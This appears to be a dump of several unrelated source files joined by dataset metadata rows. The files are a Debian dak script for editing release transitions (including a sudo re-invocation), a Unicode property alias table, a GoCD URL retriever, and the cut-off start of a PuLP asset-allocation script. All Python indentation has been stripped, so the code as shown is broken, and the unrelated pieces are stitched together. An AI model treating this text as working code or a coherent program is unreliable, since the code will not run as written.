# <elmo> if klecker.d.o died, I swear to god, I'm going to migrate to gentoo.
################################################################################
import os
import sys
import time
import errno
import fcntl
import tempfile
import apt_pkg
from daklib.dbconn import *
from daklib import utils
from daklib.dak_exceptions import TransitionsError
from daklib.regexes import re_broken_package
import yaml
# Globals
Cnf = None #: Configuration, apt_pkg.Configuration
Options = None #: Parsed CommandLine arguments
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def init():
"""
Initialize. Sets up database connection, parses commandline arguments.
@attention: This function may run B{within sudo}
"""
global Cnf, Options
apt_pkg.init()
Cnf = utils.get_conf()
Arguments = [('a',"automatic","Edit-Transitions::Options::Automatic"),
('h',"help","Edit-Transitions::Options::Help"),
('e',"edit","Edit-Transitions::Options::Edit"),
('i',"import","Edit-Transitions::Options::Import", "HasArg"),
('c',"check","Edit-Transitions::Options::Check"),
('s',"sudo","Edit-Transitions::Options::Sudo"),
('n',"no-action","Edit-Transitions::Options::No-Action")]
for i in ["automatic", "help", "no-action", "edit", "import", "check", "sudo"]:
if not Cnf.has_key("Edit-Transitions::Options::%s" % (i)):
Cnf["Edit-Transitions::Options::%s" % (i)] = ""
apt_pkg.parse_commandline(Cnf, Arguments, sys.argv)
Options = Cnf.subtree("Edit-Transitions::Options")
if Options["help"]:
usage()
username = utils.getusername()
if username != "dak":
print "Non-dak user: %s" % username
Options["sudo"] = "y"
# Initialise DB connection
DBConn()
################################################################################
def usage (exit_code=0):
print """Usage: transitions [OPTION]...
Update and check the release managers transition file.
Options:
-h, --help show this help and exit.
-e, --edit edit the transitions file
-i, --import <file> check and import transitions from file
-c, --check check the transitions file, remove outdated entries
-S, --sudo use sudo to update transitions file
-a, --automatic don't prompt (only affects check).
-n, --no-action don't do anything (only affects check)"""
sys.exit(exit_code)
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def load_transitions(trans_file):
"""
Parse a transition yaml file and check it for validity.
@attention: This function may run B{within sudo}
@type trans_file: string
@param trans_file: filename to parse
@rtype: dict or None
@return: validated dictionary of transition entries or None
if validation fails, empty string if reading C{trans_file}
returned something else than a dict
"""
# Parse the yaml file
sourcefile = file(trans_file, 'r')
sourcecontent = sourcefile.read()
failure = False
try:
trans = yaml.safe_load(sourcecontent)
except yaml.YAMLError as exc:
# Someone fucked it up
print "ERROR: %s" % (exc)
return None
# lets do further validation here
checkkeys = ["source", "reason", "packages", "new", "rm"]
# If we get an empty definition - we just have nothing to check, no transitions defined
if type(trans) != dict:
# This can be anything. We could have no transitions defined. Or someone totally fucked up the
# file, adding stuff in a way we dont know or want. Then we set it empty - and simply have no
# transitions anymore. User will see it in the information display after he quit the editor and
# could fix it
trans = ""
return trans
try:
for test in trans:
t = trans[test]
# First check if we know all the keys for the transition and if they have
# the right type (and for the packages also if the list has the right types
# included, ie. not a list in list, but only str in the list)
for key in t:
if key not in checkkeys:
print "ERROR: Unknown key %s in transition %s" % (key, test)
failure = True
if key == "packages":
if type(t[key]) != list:
print "ERROR: Unknown type %s for packages in transition %s." % (type(t[key]), test)
failure = True
try:
for package in t["packages"]:
if type(package) != str:
print "ERROR: Packages list contains invalid type %s (as %s) in transition %s" % (type(package), package, test)
failure = True
if re_broken_package.match(package):
# Someone had a space too much (or not enough), we have something looking like
# "package1 - package2" now.
print "ERROR: Invalid indentation of package list in transition %s, around package(s): %s" % (test, package)
failure = True
except TypeError:
# In case someone has an empty packages list
print "ERROR: No packages defined in transition %s" % (test)
failure = True
continue
elif type(t[key]) != str:
if key == "new" and type(t[key]) == int:
# Ok, debian native version
continue
else:
print "ERROR: Unknown type %s for key %s in transition %s" % (type(t[key]), key, test)
failure = True
# And now the other way round - are all our keys defined?
for key in checkkeys:
if key not in t:
print "ERROR: Missing key %s in transition %s" % (key, test)
failure = True
except TypeError:
# In case someone defined very broken things
print "ERROR: Unable to parse the file"
failure = True
if failure:
return None
return trans
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def lock_file(f):
"""
Lock a file
@attention: This function may run B{within sudo}
"""
for retry in range(10):
lock_fd = os.open(f, os.O_RDWR | os.O_CREAT)
try:
fcntl.lockf(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
return lock_fd
except OSError as e:
if errno.errorcode[e.errno] == 'EACCES' or errno.errorcode[e.errno] == 'EEXIST':
print "Unable to get lock for %s (try %d of 10)" % \
(file, retry+1)
time.sleep(60)
else:
raise
utils.fubar("Couldn't obtain lock for %s." % (f))
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def write_transitions(from_trans):
"""
Update the active transitions file safely.
This function takes a parsed input file (which avoids invalid
files or files that may be be modified while the function is
active) and ensure the transitions file is updated atomically
to avoid locks.
@attention: This function may run B{within sudo}
@type from_trans: dict
@param from_trans: transitions dictionary, as returned by L{load_transitions}
"""
trans_file = Cnf["Dinstall::ReleaseTransitions"]
trans_temp = trans_file + ".tmp"
trans_lock = lock_file(trans_file)
temp_lock = lock_file(trans_temp)
destfile = file(trans_temp, 'w')
yaml.safe_dump(from_trans, destfile, default_flow_style=False)
destfile.close()
os.rename(trans_temp, trans_file)
os.close(temp_lock)
os.close(trans_lock)
################################################################################
##########################################
#### This usually runs within sudo !! ####
##########################################
def write_transitions_from_file(from_file):
"""
We have a file we think is valid; if we're using sudo, we invoke it
here, otherwise we just parse the file and call write_transitions
@attention: This function usually runs B{within sudo}
@type from_file: filename
@param from_file: filename of a transitions file
"""
# Lets check if from_file is in the directory we expect it to be in
if not os.path.abspath(from_file).startswith(Cnf["Dir::TempPath"]):
print "Will not accept transitions file outside of %s" % (Cnf["Dir::TempPath"])
sys.exit(3)
if Options["sudo"]:
os.spawnl(os.P_WAIT, "/usr/bin/sudo", "/usr/bin/sudo", "-u", "dak", "-H",
"/usr/local/bin/dak", "transitions", "--import", from_file)
else:
trans = load_transitions(from_file)
if trans is None:
raise TransitionsError("Unparsable transitions file %s" % (file))
write_transitions(trans)
################################################################################
def temp_transitions_file(transitions):
"""
Open a temporary file and dump the current transitions into it, so users
can edit them.
@type transitions: dict
@param transitions: current defined transitions
@rtype: string
@return: path of newly created tempfile
@note: NB: file is unlinked by caller, but fd is never actually closed.
We need the chmod, as the file is (most possibly) copied from a
sudo-ed script and would be unreadable if it has default mkstemp mode
"""
(fd, path) = tempfile.mkstemp("", "transitions", Cnf["Dir::TempPath"])
os.chmod(path, 0o644)
f = open(path, "w")
yaml.safe_dump(transitions, f, default_flow_style=False)
return path
################################################################################
def edit_transitions():
""" Edit the defined transitions. """
trans_file = Cnf["Dinstall::ReleaseTransitions"]
edit_file = temp_transitions_file(load_transitions(trans_file))
editor = os.environ.get("EDITOR", "vi")
while True:
result = os.system("%s %s" % (editor, edit_file))
if result != 0:
os.unlink(edit_file)
utils.fubar("%s invocation failed for %s, not removing tempfile." % (editor, edit_file))
# Now try to load the new file
test = load_transitions(edit_file)
if test == None:
# Edit is broken
print "Edit was unparsable."
prompt = "[E]dit again, Drop changes?"
default = "E"
else:
print "Edit looks okay.\n"
print "The following transitions are defined:"
print "------------------------------------------------------------------------"
transition_info(test)
prompt = "[S]ave, Edit again, Drop changes?"
default = "S"
answer = "XXX"
while prompt.find(answer) == -1:
answer = utils.our_raw_input(prompt)
if answer == "":
answer = default
answer = answer[:1].upper()
if answer == 'E':
continue
elif answer == 'D':
os.unlink(edit_file)
print "OK, discarding changes"
sys.exit(0)
elif answer == 'S':
# Ready to save
break
else:
print "You pressed something you shouldn't have :("
sys.exit(1)
# We seem to be done and also have a working file. Copy over.
write_transitions_from_file(edit_file)
os.unlink(edit_file)
print "Transitions file updated."
################################################################################
def check_transitions(transitions):
"""
Check if the defined transitions still apply and remove those that no longer do.
@note: Asks the user for confirmation first unless -a has been set.
"""
global Cnf
to_dump = 0
to_remove = []
info = {}
session = DBConn().session()
# Now look through all defined transitions
for trans in transitions:
t = transitions[trans]
source = t["source"]
expected = t["new"]
# Will be an empty list if nothing is in testing.
sourceobj = get_source_in_suite(source, "testing", session)
info[trans] = get_info(trans, source, expected, t["rm"], t["reason"], t["packages"])
print info[trans]
if sourceobj is None:
# No package in testing
print "Transition source %s not in testing, transition still ongoing." % (source)
else:
current = sourceobj.version
compare = apt_pkg.version_compare(current, expected)
if compare < 0:
# This is still valid, the current version in database is older than
# the new version we wait for
print "This transition is still ongoing, we currently have version %s" % (current)
else:
print "REMOVE: This transition is over, the target package reached testing. REMOVE"
print "%s wanted version: %s, has %s" % (source, expected, current)
to_remove.append(trans)
to_dump = 1
print "-------------------------------------------------------------------------"
if to_dump:
prompt = "Removing: "
for remove in to_remove:
prompt += remove
prompt += ","
prompt += " Commit Changes? (y/N)"
answer = ""
if Options["no-action"]:
answer="n"
elif Options["automatic"]:
answer="y"
else:
answer = utils.our_raw_input(prompt).lower()
if answer == "":
answer = "n"
if answer == 'n':
print "Not committing changes"
sys.exit(0)
elif answer == 'y':
print "Committing"
subst = {}
subst['__SUBJECT__'] = "Transitions completed: " + ", ".join(sorted(to_remove))
subst['__TRANSITION_MESSAGE__'] = "The following transitions were removed:\n"
for remove in sorted(to_remove):
subst['__TRANSITION_MESSAGE__'] += info[remove] + '\n'
del transitions[remove]
# If we have a mail address configured for transitions,
# send a notification
subst['__TRANSITION_EMAIL__'] = Cnf.get("Transitions::Notifications", "")
if subst['__TRANSITION_EMAIL__'] != "":
print "Sending notification to %s" % subst['__TRANSITION_EMAIL__']
subst['__DAK_ADDRESS__'] = Cnf["Dinstall::MyEmailAddress"]
subst['__BCC__'] = 'X-DAK: dak transitions'
if Cnf.has_key("Dinstall::Bcc"):
subst["__BCC__"] += '\nBcc: %s' % Cnf["Dinstall::Bcc"]
message = utils.TemplateSubst(subst,
os.path.join(Cnf["Dir::Templates"], 'transition.removed'))
utils.send_mail(message)
edit_file = temp_transitions_file(transitions)
write_transitions_from_file(edit_file)
print "Done"
else:
print "WTF are you typing?"
sys.exit(0)
################################################################################
def get_info(trans, source, expected, rm, reason, packages):
"""
Print information about a single transition.
@type trans: string
@param trans: Transition name
@type source: string
@param source: Source package
@type expected: string
@param expected: Expected version in testing
@type rm: string
@param rm: Responsible RM
@type reason: string
@param reason: Reason
@type packages: list
@param packages: list of blocked packages
"""
return """Looking at transition: %s
Source: %s
New Version: %s
Responsible: %s
Description: %s
Blocked Packages (total: %d): %s
""" % (trans, source, expected, rm, reason, len(packages), ", ".join(packages))
################################################################################
def transition_info(transitions):
"""
Print information about all defined transitions.
Calls L{get_info} for every transition and then tells user if the transition is
still ongoing or if the expected version already hit testing.
@type transitions: dict
@param transitions: defined transitions
"""
session = DBConn().session()
for trans in transitions:
t = transitions[trans]
source = t["source"]
expected = t["new"]
# Will be None if nothing is in testing.
sourceobj = get_source_in_suite(source, "testing", session)
print get_info(trans, source, expected, t["rm"], t["reason"], t["packages"])
if sourceobj is None:
# No package in testing
print "Transition source %s not in testing, transition still ongoing." % (source)
else:
compare = apt_pkg.version_compare(sourceobj.version, expected)
print "Apt compare says: %s" % (compare)
if compare < 0:
# This is still valid, the current version in database is older than
# the new version we wait for
print "This transition is still ongoing, we currently have version %s" % (sourceobj.version)
else:
print "This transition is over, the target package reached testing, should be removed"
print "%s wanted version: %s, has %s" % (source, expected, sourceobj.version)
print "-------------------------------------------------------------------------"
################################################################################
def main():
"""
Prepare the work to be done, do basic checks.
@attention: This function may run B{within sudo}
"""
global Cnf
#####################################
#### This can run within sudo !! ####
#####################################
init()
# Check if there is a file defined (and existant)
transpath = Cnf.get("Dinstall::ReleaseTransitions", "")
if transpath == "":
utils.warn("Dinstall::ReleaseTransitions not defined")
sys.exit(1)
if not os.path.exists(transpath):
utils.warn("ReleaseTransitions file, %s, not found." %
(Cnf["Dinstall::ReleaseTransitions"]))
sys.exit(1)
# Also check if our temp directory is defined and existant
temppath = Cnf.get("Dir::TempPath", "")
if temppath == "":
utils.warn("Dir::TempPath not defined")
sys.exit(1)
if not os.path.exists(temppath):
utils.warn("Temporary path %s not found." %
(Cnf["Dir::TempPath"]))
sys.exit(1)
if Options["import"]:
try:
write_transitions_from_file(Options["import"])
except TransitionsError as m:
print m
sys.exit(2)
sys.exit(0)
##############################################
#### Up to here it can run within sudo !! ####
##############################################
# Parse the yaml file
transitions = load_transitions(transpath)
if transitions == None:
# Something very broken with the transitions, exit
utils.warn("Could not parse existing transitions file. Aborting.")
sys.exit(2)
if Options["edit"]:
# Let's edit the transitions file
edit_transitions()
elif Options["check"]:
# Check and remove outdated transitions
check_transitions(transitions)
else:
# Output information about the currently defined transitions.
print "Currently defined transitions:"
transition_info(transitions)
sys.exit(0)
################################################################################
if __name__ == '__main__':
main()
| gpl-2.0 | 4,832,202,560,691,502,000 | 34.210273 | 143 | 0.52913 | false |
dmilith/SublimeText3-dmilith | Packages/backrefs/st3/backrefs/uniprops/unidata/alias.py | 2 | 18637 | """Unicode Properties from Unicode version 6.1.0 (autogen)."""
unicode_alias = {
"_": {
"age": "age",
"bc": "bidiclass",
"blk": "block",
"ccc": "canonicalcombiningclass",
"dt": "decompositiontype",
"ea": "eastasianwidth",
"gc": "generalcategory",
"gcb": "graphemeclusterbreak",
"hst": "hangulsyllabletype",
"inmc": "indicmatracategory",
"insc": "indicsyllabiccategory",
"jg": "joininggroup",
"jt": "joiningtype",
"lb": "linebreak",
"nfcqc": "nfcquickcheck",
"nfdqc": "nfdquickcheck",
"nfkcqc": "nfkcquickcheck",
"nfkdqc": "nfkdquickcheck",
"nt": "numerictype",
"nv": "numericvalue",
"sb": "sentencebreak",
"sc": "script",
"scx": "scriptextensions",
"wb": "wordbreak"
},
"age": {
"unassigned": "na",
"v11": "1.1",
"v20": "2.0",
"v21": "2.1",
"v30": "3.0",
"v31": "3.1",
"v32": "3.2",
"v40": "4.0",
"v41": "4.1",
"v50": "5.0",
"v51": "5.1",
"v52": "5.2",
"v60": "6.0",
"v61": "6.1"
},
"bidiclass": {
"arabicletter": "al",
"arabicnumber": "an",
"boundaryneutral": "bn",
"commonseparator": "cs",
"europeannumber": "en",
"europeanseparator": "es",
"europeanterminator": "et",
"lefttoright": "l",
"lefttorightembedding": "lre",
"lefttorightoverride": "lro",
"nonspacingmark": "nsm",
"otherneutral": "on",
"paragraphseparator": "b",
"popdirectionalformat": "pdf",
"righttoleft": "r",
"righttoleftembedding": "rle",
"righttoleftoverride": "rlo",
"segmentseparator": "s",
"whitespace": "ws"
},
"binary": {
"ahex": "asciihexdigit",
"alpha": "alphabetic",
"bidic": "bidicontrol",
"bidim": "bidimirrored",
"blank": "posixblank",
"cased": "cased",
"ce": "compositionexclusion",
"ci": "caseignorable",
"compex": "fullcompositionexclusion",
"cwcf": "changeswhencasefolded",
"cwcm": "changeswhencasemapped",
"cwkcf": "changeswhennfkccasefolded",
"cwl": "changeswhenlowercased",
"cwt": "changeswhentitlecased",
"cwu": "changeswhenuppercased",
"dash": "dash",
"dep": "deprecated",
"di": "defaultignorablecodepoint",
"dia": "diacritic",
"ext": "extender",
"graph": "posixgraph",
"grbase": "graphemebase",
"grext": "graphemeextend",
"grlink": "graphemelink",
"hex": "hexdigit",
"hyphen": "hyphen",
"idc": "idcontinue",
"ideo": "ideographic",
"ids": "idstart",
"idsb": "idsbinaryoperator",
"idst": "idstrinaryoperator",
"joinc": "joincontrol",
"loe": "logicalorderexception",
"lower": "lowercase",
"math": "math",
"nchar": "noncharactercodepoint",
"oalpha": "otheralphabetic",
"odi": "otherdefaultignorablecodepoint",
"ogrext": "othergraphemeextend",
"oidc": "otheridcontinue",
"oids": "otheridstart",
"olower": "otherlowercase",
"omath": "othermath",
"oupper": "otheruppercase",
"patsyn": "patternsyntax",
"patws": "patternwhitespace",
"posixalpha": "alphabetic",
"posixlower": "lowercase",
"posixspace": "whitespace",
"posixupper": "uppercase",
"print": "posixprint",
"qmark": "quotationmark",
"radical": "radical",
"sd": "softdotted",
"space": "whitespace",
"sterm": "sterm",
"term": "terminalpunctuation",
"uideo": "unifiedideograph",
"upper": "uppercase",
"vs": "variationselector",
"wspace": "whitespace",
"xidc": "xidcontinue",
"xids": "xidstart"
},
"block": {
"alchemical": "alchemicalsymbols",
"alphabeticpf": "alphabeticpresentationforms",
"ancientgreekmusic": "ancientgreekmusicalnotation",
"arabicexta": "arabicextendeda",
"arabicmath": "arabicmathematicalalphabeticsymbols",
"arabicpfa": "arabicpresentationformsa",
"arabicpfb": "arabicpresentationformsb",
"arabicsup": "arabicsupplement",
"ascii": "basiclatin",
"bamumsup": "bamumsupplement",
"bopomofoext": "bopomofoextended",
"braille": "braillepatterns",
"byzantinemusic": "byzantinemusicalsymbols",
"canadiansyllabics": "unifiedcanadianaboriginalsyllabics",
"cjk": "cjkunifiedideographs",
"cjkcompat": "cjkcompatibility",
"cjkcompatforms": "cjkcompatibilityforms",
"cjkcompatideographs": "cjkcompatibilityideographs",
"cjkcompatideographssup": "cjkcompatibilityideographssupplement",
"cjkexta": "cjkunifiedideographsextensiona",
"cjkextb": "cjkunifiedideographsextensionb",
"cjkextc": "cjkunifiedideographsextensionc",
"cjkextd": "cjkunifiedideographsextensiond",
"cjkradicalssup": "cjkradicalssupplement",
"cjksymbols": "cjksymbolsandpunctuation",
"combiningmarksforsymbols": "combiningdiacriticalmarksforsymbols",
"compatjamo": "hangulcompatibilityjamo",
"countingrod": "countingrodnumerals",
"cuneiformnumbers": "cuneiformnumbersandpunctuation",
"cyrillicexta": "cyrillicextendeda",
"cyrillicextb": "cyrillicextendedb",
"cyrillicsup": "cyrillicsupplement",
"cyrillicsupplementary": "cyrillicsupplement",
"devanagariext": "devanagariextended",
"diacriticals": "combiningdiacriticalmarks",
"diacriticalsforsymbols": "combiningdiacriticalmarksforsymbols",
"diacriticalssup": "combiningdiacriticalmarkssupplement",
"domino": "dominotiles",
"enclosedalphanum": "enclosedalphanumerics",
"enclosedalphanumsup": "enclosedalphanumericsupplement",
"enclosedcjk": "enclosedcjklettersandmonths",
"enclosedideographicsup": "enclosedideographicsupplement",
"ethiopicext": "ethiopicextended",
"ethiopicexta": "ethiopicextendeda",
"ethiopicsup": "ethiopicsupplement",
"georgiansup": "georgiansupplement",
"greek": "greekandcoptic",
"greekext": "greekextended",
"halfandfullforms": "halfwidthandfullwidthforms",
"halfmarks": "combininghalfmarks",
"hangul": "hangulsyllables",
"highpusurrogates": "highprivateusesurrogates",
"idc": "ideographicdescriptioncharacters",
"indicnumberforms": "commonindicnumberforms",
"ipaext": "ipaextensions",
"jamo": "hanguljamo",
"jamoexta": "hanguljamoextendeda",
"jamoextb": "hanguljamoextendedb",
"kanasup": "kanasupplement",
"kangxi": "kangxiradicals",
"katakanaext": "katakanaphoneticextensions",
"latin1": "latin1supplement",
"latin1sup": "latin1supplement",
"latinexta": "latinextendeda",
"latinextadditional": "latinextendedadditional",
"latinextb": "latinextendedb",
"latinextc": "latinextendedc",
"latinextd": "latinextendedd",
"mahjong": "mahjongtiles",
"mathalphanum": "mathematicalalphanumericsymbols",
"mathoperators": "mathematicaloperators",
"meeteimayekext": "meeteimayekextensions",
"miscarrows": "miscellaneoussymbolsandarrows",
"miscmathsymbolsa": "miscellaneousmathematicalsymbolsa",
"miscmathsymbolsb": "miscellaneousmathematicalsymbolsb",
"miscpictographs": "miscellaneoussymbolsandpictographs",
"miscsymbols": "miscellaneoussymbols",
"misctechnical": "miscellaneoustechnical",
"modifierletters": "spacingmodifierletters",
"music": "musicalsymbols",
"myanmarexta": "myanmarextendeda",
"nb": "noblock",
"ocr": "opticalcharacterrecognition",
"phaistos": "phaistosdisc",
"phoneticext": "phoneticextensions",
"phoneticextsup": "phoneticextensionssupplement",
"privateuse": "privateusearea",
"pua": "privateusearea",
"punctuation": "generalpunctuation",
"rumi": "ruminumeralsymbols",
"smallforms": "smallformvariants",
"sundanesesup": "sundanesesupplement",
"suparrowsa": "supplementalarrowsa",
"suparrowsb": "supplementalarrowsb",
"superandsub": "superscriptsandsubscripts",
"supmathoperators": "supplementalmathematicaloperators",
"suppuaa": "supplementaryprivateuseareaa",
"suppuab": "supplementaryprivateuseareab",
"suppunctuation": "supplementalpunctuation",
"taixuanjing": "taixuanjingsymbols",
"transportandmap": "transportandmapsymbols",
"ucas": "unifiedcanadianaboriginalsyllabics",
"ucasext": "unifiedcanadianaboriginalsyllabicsextended",
"vedicext": "vedicextensions",
"vs": "variationselectors",
"vssup": "variationselectorssupplement",
"yijing": "yijinghexagramsymbols"
},
"canonicalcombiningclass": {
"a": "230",
"above": "230",
"aboveleft": "228",
"aboveright": "232",
"al": "228",
"ar": "232",
"ata": "214",
"atar": "216",
"atb": "202",
"atbl": "200",
"attachedabove": "214",
"attachedaboveright": "216",
"attachedbelow": "202",
"attachedbelowleft": "200",
"b": "220",
"below": "220",
"belowleft": "218",
"belowright": "222",
"bl": "218",
"br": "222",
"ccc10": "10",
"ccc103": "103",
"ccc107": "107",
"ccc11": "11",
"ccc118": "118",
"ccc12": "12",
"ccc122": "122",
"ccc129": "129",
"ccc13": "13",
"ccc130": "130",
"ccc133": "132",
"ccc14": "14",
"ccc15": "15",
"ccc16": "16",
"ccc17": "17",
"ccc18": "18",
"ccc19": "19",
"ccc20": "20",
"ccc21": "21",
"ccc22": "22",
"ccc23": "23",
"ccc24": "24",
"ccc25": "25",
"ccc26": "26",
"ccc27": "27",
"ccc28": "28",
"ccc29": "29",
"ccc30": "30",
"ccc31": "31",
"ccc32": "32",
"ccc33": "33",
"ccc34": "34",
"ccc35": "35",
"ccc36": "36",
"ccc84": "84",
"ccc91": "91",
"da": "234",
"db": "233",
"doubleabove": "234",
"doublebelow": "233",
"iotasubscript": "240",
"is": "240",
"kanavoicing": "8",
"kv": "8",
"l": "224",
"left": "224",
"nk": "7",
"notreordered": "0",
"nr": "0",
"nukta": "7",
"ov": "1",
"overlay": "1",
"r": "226",
"right": "226",
"virama": "9",
"vr": "9"
},
"decompositiontype": {
"can": "canonical",
"com": "compat",
"enc": "circle",
"fin": "final",
"fra": "fraction",
"init": "initial",
"iso": "isolated",
"med": "medial",
"nar": "narrow",
"nb": "nobreak",
"sml": "small",
"sqr": "square",
"sup": "super",
"vert": "vertical"
},
"eastasianwidth": {
"ambiguous": "a",
"fullwidth": "f",
"halfwidth": "h",
"narrow": "na",
"neutral": "n",
"wide": "w"
},
"generalcategory": {
"casedletter": "lc",
"closepunctuation": "pe",
"cntrl": "cc",
"combiningmark": "m",
"connectorpunctuation": "pc",
"control": "cc",
"currencysymbol": "sc",
"dashpunctuation": "pd",
"decimalnumber": "nd",
"digit": "nd",
"enclosingmark": "me",
"finalpunctuation": "pf",
"format": "cf",
"initialpunctuation": "pi",
"letter": "l",
"letternumber": "nl",
"lineseparator": "zl",
"lowercaseletter": "ll",
"mark": "m",
"mathsymbol": "sm",
"modifierletter": "lm",
"modifiersymbol": "sk",
"nonspacingmark": "mn",
"number": "n",
"openpunctuation": "ps",
"other": "c",
"otherletter": "lo",
"othernumber": "no",
"otherpunctuation": "po",
"othersymbol": "so",
"paragraphseparator": "zp",
"privateuse": "co",
"punct": "p",
"punctuation": "p",
"separator": "z",
"spaceseparator": "zs",
"spacingmark": "mc",
"surrogate": "cs",
"symbol": "s",
"titlecaseletter": "lt",
"unassigned": "cn",
"uppercaseletter": "lu"
},
"graphemeclusterbreak": {
"cn": "control",
"ex": "extend",
"pp": "prepend",
"sm": "spacingmark",
"xx": "other"
},
"hangulsyllabletype": {
"leadingjamo": "l",
"lvsyllable": "lv",
"lvtsyllable": "lvt",
"notapplicable": "na",
"trailingjamo": "t",
"voweljamo": "v"
},
"indicmatracategory": {
},
"indicsyllabiccategory": {
},
"joininggroup": {
"hamzaonhehgoal": "tehmarbutagoal"
},
"joiningtype": {
"dualjoining": "d",
"joincausing": "c",
"leftjoining": "l",
"nonjoining": "u",
"rightjoining": "r",
"transparent": "t"
},
"linebreak": {
"alphabetic": "al",
"ambiguous": "ai",
"breakafter": "ba",
"breakbefore": "bb",
"breakboth": "b2",
"breaksymbols": "sy",
"carriagereturn": "cr",
"closeparenthesis": "cp",
"closepunctuation": "cl",
"combiningmark": "cm",
"complexcontext": "sa",
"conditionaljapanesestarter": "cj",
"contingentbreak": "cb",
"exclamation": "ex",
"glue": "gl",
"hebrewletter": "hl",
"hyphen": "hy",
"ideographic": "id",
"infixnumeric": "is",
"inseparable": "in",
"inseperable": "in",
"linefeed": "lf",
"mandatorybreak": "bk",
"nextline": "nl",
"nonstarter": "ns",
"numeric": "nu",
"openpunctuation": "op",
"postfixnumeric": "po",
"prefixnumeric": "pr",
"quotation": "qu",
"space": "sp",
"surrogate": "sg",
"unknown": "xx",
"wordjoiner": "wj",
"zwspace": "zw"
},
"nfcquickcheck": {
"maybe": "m",
"no": "n",
"yes": "y"
},
"nfdquickcheck": {
"no": "n",
"yes": "y"
},
"nfkcquickcheck": {
"maybe": "m",
"no": "n",
"yes": "y"
},
"nfkdquickcheck": {
"no": "n",
"yes": "y"
},
"numerictype": {
"de": "decimal",
"di": "digit",
"nu": "numeric"
},
"numericvalue": {
},
"script": {
"arab": "arabic",
"armi": "imperialaramaic",
"armn": "armenian",
"avst": "avestan",
"bali": "balinese",
"bamu": "bamum",
"batk": "batak",
"beng": "bengali",
"bopo": "bopomofo",
"brah": "brahmi",
"brai": "braille",
"bugi": "buginese",
"buhd": "buhid",
"cakm": "chakma",
"cans": "canadianaboriginal",
"cari": "carian",
"cher": "cherokee",
"copt": "coptic",
"cprt": "cypriot",
"cyrl": "cyrillic",
"deva": "devanagari",
"dsrt": "deseret",
"egyp": "egyptianhieroglyphs",
"ethi": "ethiopic",
"geor": "georgian",
"glag": "glagolitic",
"goth": "gothic",
"grek": "greek",
"gujr": "gujarati",
"guru": "gurmukhi",
"hang": "hangul",
"hani": "han",
"hano": "hanunoo",
"hebr": "hebrew",
"hira": "hiragana",
"hrkt": "katakanaorhiragana",
"ital": "olditalic",
"java": "javanese",
"kali": "kayahli",
"kana": "katakana",
"khar": "kharoshthi",
"khmr": "khmer",
"knda": "kannada",
"kthi": "kaithi",
"lana": "taitham",
"laoo": "lao",
"latn": "latin",
"lepc": "lepcha",
"limb": "limbu",
"linb": "linearb",
"lyci": "lycian",
"lydi": "lydian",
"mand": "mandaic",
"merc": "meroiticcursive",
"mero": "meroitichieroglyphs",
"mlym": "malayalam",
"mong": "mongolian",
"mtei": "meeteimayek",
"mymr": "myanmar",
"nkoo": "nko",
"ogam": "ogham",
"olck": "olchiki",
"orkh": "oldturkic",
"orya": "oriya",
"osma": "osmanya",
"phag": "phagspa",
"phli": "inscriptionalpahlavi",
"phnx": "phoenician",
"plrd": "miao",
"prti": "inscriptionalparthian",
"qaac": "coptic",
"qaai": "inherited",
"rjng": "rejang",
"runr": "runic",
"samr": "samaritan",
"sarb": "oldsoutharabian",
"saur": "saurashtra",
"shaw": "shavian",
"shrd": "sharada",
"sinh": "sinhala",
"sora": "sorasompeng",
"sund": "sundanese",
"sylo": "sylotinagri",
"syrc": "syriac",
"tagb": "tagbanwa",
"takr": "takri",
"tale": "taile",
"talu": "newtailue",
"taml": "tamil",
"tavt": "taiviet",
"telu": "telugu",
"tfng": "tifinagh",
"tglg": "tagalog",
"thaa": "thaana",
"tibt": "tibetan",
"ugar": "ugaritic",
"vaii": "vai",
"xpeo": "oldpersian",
"xsux": "cuneiform",
"yiii": "yi",
"zinh": "inherited",
"zyyy": "common",
"zzzz": "unknown"
},
"scriptextensions": {
},
"sentencebreak": {
"at": "aterm",
"cl": "close",
"ex": "extend",
"fo": "format",
"le": "oletter",
"lo": "lower",
"nu": "numeric",
"sc": "scontinue",
"se": "sep",
"st": "sterm",
"up": "upper",
"xx": "other"
},
"wordbreak": {
"ex": "extendnumlet",
"fo": "format",
"ka": "katakana",
"le": "aletter",
"mb": "midnumlet",
"ml": "midletter",
"mn": "midnum",
"nl": "newline",
"nu": "numeric",
"xx": "other"
}
}
| mit | 8,074,594,444,167,502,000 | 29.452614 | 74 | 0.497988 | false |
greenmoss/gocd-parser | gocd_parser/retriever/url.py | 1 | 1803 | import six
from six.moves.urllib.parse import urlsplit
import logging
logger = logging.getLogger(__name__)
import requests
class URLException(Exception):
pass
class URL(object):
'''Retrieve from a Go server.'''
def __init__(self, go_server, path='', headers=None):
self.go_server = go_server
self.contents = []
full_url = go_server.url + path
logger.debug("reading url %s"%full_url)
# TODO: session would be better?
#s = requests.Session()
#if self.go_server.user and self.go_server.password:
# logger.debug("logging in as %s"%self.go_server.user)
# s.auth = (self.go_server.user, self.go_server.password)
#if headers is not None:
# s.headers.update(headers)
#r = requests.get(full_url)
if headers is None:
headers = {}
if self.go_server.user and self.go_server.password:
logger.debug("logging in as %s"%self.go_server.user)
r = requests.get(full_url, auth=(self.go_server.user,
self.go_server.password), headers=headers)
else:
r = requests.get(full_url, headers=headers)
# TODO: return r instead! Let objects just use this as is!
if r.status_code != 200:
raise URLException('Retrieval of %s failed with code %d', full_url,
r.status_code)
for line in r.iter_lines():
self.contents.append(line)
path_parts = urlsplit(full_url).path.split('/')
last = path_parts[-1]
# /path/to/something/
if last is '':
path_parts.pop()
last = path_parts[-1]
self.path_parts = path_parts
self.file_name = last
self.file_path = '/'.join(path_parts[0:-1])
| mit | -7,048,192,591,833,760,000 | 29.05 | 79 | 0.574043 | false |
charles-difazio/asset-optimization | asset.py | 1 | 4559 | from pulp import *
from lxml import etree
import requests
prob = LpProblem("Assets", LpMinimize)
allocation = { 'stock_us' : 0.8 * 0.9 * 0.6,
'stock_intl' : 0.8 * 0.9 * 0.4,
'reit' : 0.8 * 0.1,
'bond_us' : 0.2 * 0.8,
'bond_intl' : 0.2 * 0.2 }
category = { 'Mid-Cap Blend' : { 'stock_us' : 1 },
'Foreign Large Blend' : { 'stock_intl' : 1 },
'Real Estate' : { 'reit' : 1 },
